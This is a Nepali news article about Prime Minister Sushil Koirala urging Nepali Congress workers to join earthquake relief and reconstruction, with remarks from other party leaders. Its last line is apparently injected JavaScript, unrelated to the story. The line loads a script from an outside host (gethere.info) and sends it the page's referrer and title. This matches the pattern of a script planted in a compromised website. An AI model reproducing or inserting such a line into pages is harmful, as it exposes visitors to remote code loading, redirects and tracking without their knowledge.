प्रधानमन्त्री सुशील कोईरालाले दलिय स्वार्थभन्दा माथि उठेर राहत र पुर्नस्थापनाको कार्यमा जुट्न आग्रह गर्नुभएको छ। शनिबार प्रधानमन्त्री निबास बालुवाटारमा नेपाली काग्रेस राष्ट्रिय खेलकुद बिभागले आयोजना गरेको बिपत व्यबस्थापन स्वयंसेवक परिचालन कार्यक्रममा प्रधानमन्त्री कोईरालाले नेपालको बिपतको घडिमा सबै एक भएर पुननिर्माणमा लाग्नुपर्ने बताउनुभएको हो।

काग्रेस सभापति समेत रहनुभएका कोईरालाले भूकम्प प्रभाबित क्षेत्रमा राहत उद्धार र पुननिर्माणको कार्यमा जुट्न कार्यकर्तालाई निर्देशन समेत दिनुभयो। उहाले नेपाल बिपतको घडिको अबस्थाबाट निस्कदै बिकासको बाटोमा लम्कने बिश्वास समेत गर्नुभयो।

कार्यक्रममा काग्रेस बरिष्ठ नेता शेर वहादुर देउवाले काग्रेस जनताको आगनमा गएर जनताको सेवामा लाग्ने बताउनुभयो। त्यस्तै काग्रेस उपसभापति रामचन्द्र पौडेल राहत र उद्धारका कार्यमा कुनै पनि कमि हुन नदिने दाबी गर्नुभयो।कार्यक्रममा प्रधानमन्त्री कोईरालाले पुननिर्माणमा खटिएका नेता तथा कार्यकर्तालाई हेलमेट लगाएतका उपकरण हस्तान्तरण गर्नुभएको थियो ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;